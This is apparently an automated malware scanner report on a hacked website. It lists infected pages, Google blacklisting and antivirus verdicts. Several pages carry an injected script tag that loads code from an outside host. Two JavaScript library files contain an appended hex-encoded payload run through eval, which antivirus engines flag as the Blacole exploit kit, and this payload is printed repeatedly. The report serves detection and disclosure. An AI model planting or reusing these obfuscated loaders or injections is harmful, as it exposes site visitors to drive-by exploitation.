Malware Scanner report for jmassociates.globat.com

Malicious/Suspicious/Total urls checked: 7/7/15

14 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "jmassociates.globat.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jmassociates.globat.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://jmassociates.globat.com/	200 OK Content-Length: 9423 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script>
http://jmassociates.globat.com/SpryAssets/SpryMenuBar.js	200 OK Content-Length: 13067 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d ... 3355 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX TrendMicro-HouseCall JS_BLACOLE.SMTM Emsisoft JS:Trojan.Script.CFX (B) Comodo Exploit.JS.Blacole.EZ McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMTM Kaspersky Trojan.JS.Iframe.agi Microsoft Exploit:JS/Blacole.OL MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.cdoahu VIPRE Trojan.JS.IFrame.afk (v) AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX BitDefender JS:Trojan.Script.CFX
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js	200 OK Content-Length: 72174 Content-Type: text/javascript	clean
http://jmassociates.globat.com/fadeslideshow.js	200 OK Content-Length: 17524 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-" setting.wrapperid) : 0... 3115 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: Avast JS:Decode-AZW [Trj] McAfee-GW-Edition JS/Exploit-Blacole.ht McAfee JS/Exploit-Blacole.ht Symantec Trojan.Malscript
http://jmassociates.globat.com/index.html	200 OK Content-Length: 9423 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script>
http://jmassociates.globat.com/espanol/index.html	200 OK Content-Length: 9848 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script>
http://jmassociates.globat.com/espanol/../SpryAssets/SpryMenuBar.js	200 OK Content-Length: 13067 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d ... 3355 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX TrendMicro-HouseCall JS_BLACOLE.SMTM Emsisoft JS:Trojan.Script.CFX (B) Comodo Exploit.JS.Blacole.EZ McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMTM Kaspersky Trojan.JS.Iframe.agi Microsoft Exploit:JS/Blacole.OL MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.cdoahu VIPRE Trojan.JS.IFrame.afk (v) AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX BitDefender JS:Trojan.Script.CFX
http://jmassociates.globat.com/espanol/../fadeslideshow.js	200 OK Content-Length: 17524 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-" setting.wrapperid) : 0... 3115 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: Avast JS:Decode-AZW [Trj] McAfee-GW-Edition JS/Exploit-Blacole.ht McAfee JS/Exploit-Blacole.ht Symantec Trojan.Malscript
http://jmassociates.globat.com/espanol/../index.html	200 OK Content-Length: 9423 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script>
http://jmassociates.globat.com/espanol/../espanol/index.html	200 OK Content-Length: 9848 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script>
http://jmassociates.globat.com/espanol/../espanol/../SpryAssets/SpryMenuBar.js	200 OK Content-Length: 13067 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d ... 3355 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX TrendMicro-HouseCall JS_BLACOLE.SMTM Emsisoft JS:Trojan.Script.CFX (B) Comodo Exploit.JS.Blacole.EZ McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMTM Kaspersky Trojan.JS.Iframe.agi Microsoft Exploit:JS/Blacole.OL MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.cdoahu VIPRE Trojan.JS.IFrame.afk (v) AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX BitDefender JS:Trojan.Script.CFX
http://jmassociates.globat.com/espanol/../espanol/../fadeslideshow.js	200 OK Content-Length: 17524 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-" setting.wrapperid) : 0... 3115 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: Avast JS:Decode-AZW [Trj] McAfee-GW-Edition JS/Exploit-Blacole.ht McAfee JS/Exploit-Blacole.ht Symantec Trojan.Malscript
http://jmassociates.globat.com/espanol/../espanol/../index.html	200 OK Content-Length: 9423 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script>
http://jmassociates.globat.com/espanol/../espanol/../espanol/index.html	200 OK Content-Length: 9848 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script>
http://jmassociates.globat.com/espanol/../espanol/../espanol/../SpryAssets/SpryMenuBar.js	200 OK Content-Length: 13067 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d ... 3355 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i =2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr" "omCharCode"].apply(ss,z)); Antivirus reports: AntiVir JS/Blacole.EB.46 Avast JS:Decode-AZW [Trj] Ad-Aware JS:Trojan.Script.CFX Ikarus Trojan.JS.Agent nProtect JS:Trojan.Script.CFX TrendMicro-HouseCall JS_BLACOLE.SMTM Emsisoft JS:Trojan.Script.CFX (B) Comodo Exploit.JS.Blacole.EZ McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMTM Kaspersky Trojan.JS.Iframe.agi Microsoft Exploit:JS/Blacole.OL MicroWorld-eScan JS:Trojan.Script.CFX Fortinet JS/Kryptik.CFX!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.cdoahu VIPRE Trojan.JS.IFrame.afk (v) AVG JS/Exploit Norman Blacole.VX GData JS:Trojan.Script.CFX BitDefender JS:Trojan.Script.CFX

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jmassociates.globat.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 29 Sep 2014 03:22:31 GMT
Accept-Ranges: bytes
Age: 0
ETag: "24cf-502294e250e38"
Server: Apache/2
Content-Length: 9423
Content-Type: text/html
Expires: Mon, 29 Sep 2014 04:22:31 GMT
Last-Modified: Wed, 03 Sep 2014 13:35:11 GMT

...9423 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: jmassociates.globat.com
Referer: http://www.google.com/search?q=jmassociates.globat.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for jmassociates.globat.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools